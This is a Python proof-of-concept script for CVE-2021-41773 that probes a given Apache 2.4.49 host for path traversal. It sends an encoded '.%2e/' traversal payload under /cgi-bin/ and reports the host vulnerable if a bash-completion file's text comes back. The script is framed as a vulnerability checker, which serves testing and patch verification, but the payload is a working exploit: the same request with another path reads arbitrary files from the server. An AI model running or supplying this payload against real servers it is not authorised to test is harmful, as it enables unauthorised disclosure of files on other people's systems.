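############################################################################
# PoC for CVE-2021-41773
#
# By: Jordan Jay (@0xLegacyy)
#
# Apache 2.4.49 is the only version vulnerable to this.
#
# Usage: <this script> https://host[:port] [--nosslcheck]
############################################################################
import argparse
import sys

import requests

# Marker text expected in the response body when the traversal reaches the file.
FLAG = "bash_completion - programmable completion functions for bash"
# Traversal path requested under /cgi-bin/; the target is world-readable under
# /usr/share, so a default Apache config permits serving it if the bug is present.
PAYLOAD = ".%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/usr/share/bash-completion/bash_completion"
# Connect/read timeout in seconds; without one a silent host hangs the check forever.
DEFAULT_TIMEOUT = 10.0


def is_vulnerable(host: str, verify_ssl: bool = True, timeout: float = DEFAULT_TIMEOUT) -> bool:
    """Return True if ``host`` serves the traversal target via ``/cgi-bin/``.

    Args:
        host: base URL including the scheme; a trailing slash is tolerated
            (it is stripped so the request path does not start with ``//``).
        verify_ssl: forwarded to ``requests.get`` as ``verify``.
        timeout: per-request timeout in seconds.

    Raises:
        requests.exceptions.RequestException: on connection, timeout or
            protocol errors (the caller decides how to report them).
    """
    url = f"{host.rstrip('/')}/cgi-bin/{PAYLOAD}"
    response = requests.get(url, verify=verify_ssl, timeout=timeout)
    # errors="replace": a binary or non-UTF-8 body must not crash the check.
    body = response.content.decode(errors="replace")
    return FLAG in body


def main() -> int:
    """Parse the command line, run the check and return the process exit code.

    Returns 0 when the host looks vulnerable, -1 when it does not, when the
    host argument lacks a scheme, or when the request itself fails.
    """
    parser = argparse.ArgumentParser(
        description="Checks if an apache server is vulnerable to CVE-2021-41773."
    )
    parser.add_argument("host", help="ip/domain to be checked e.g. 'https://google.com/'")
    parser.add_argument(
        "--nosslcheck",
        "-n",
        dest="verify_ssl",
        action="store_false",  # store_false defaults to True, so verification is on unless flagged
        help="Do not verify ssl certificates",
    )
    parser.add_argument(
        "--timeout",
        "-t",
        type=float,
        default=DEFAULT_TIMEOUT,
        help=f"request timeout in seconds (default {DEFAULT_TIMEOUT:g})",
    )
    args = parser.parse_args()

    # We cannot guess http:// vs https:// for the user, so require an explicit scheme.
    if "://" not in args.host:
        print("[!] Host paramater missing protocol (http:// or https://)\nexiting...")
        return -1

    try:
        vulnerable = is_vulnerable(args.host, verify_ssl=args.verify_ssl, timeout=args.timeout)
    except requests.exceptions.RequestException as err:
        # A refused connection or timeout is "could not check", not "not vulnerable".
        print(f"[!] Request to {args.host} failed: {err}\nexiting...")
        return -1

    if not vulnerable:
        print(f"[-] {args.host} not vulnerable")
        return -1

    print(f"[+] {args.host} is vulnerable!")
    return 0


if __name__ == "__main__":
    sys.exit(main())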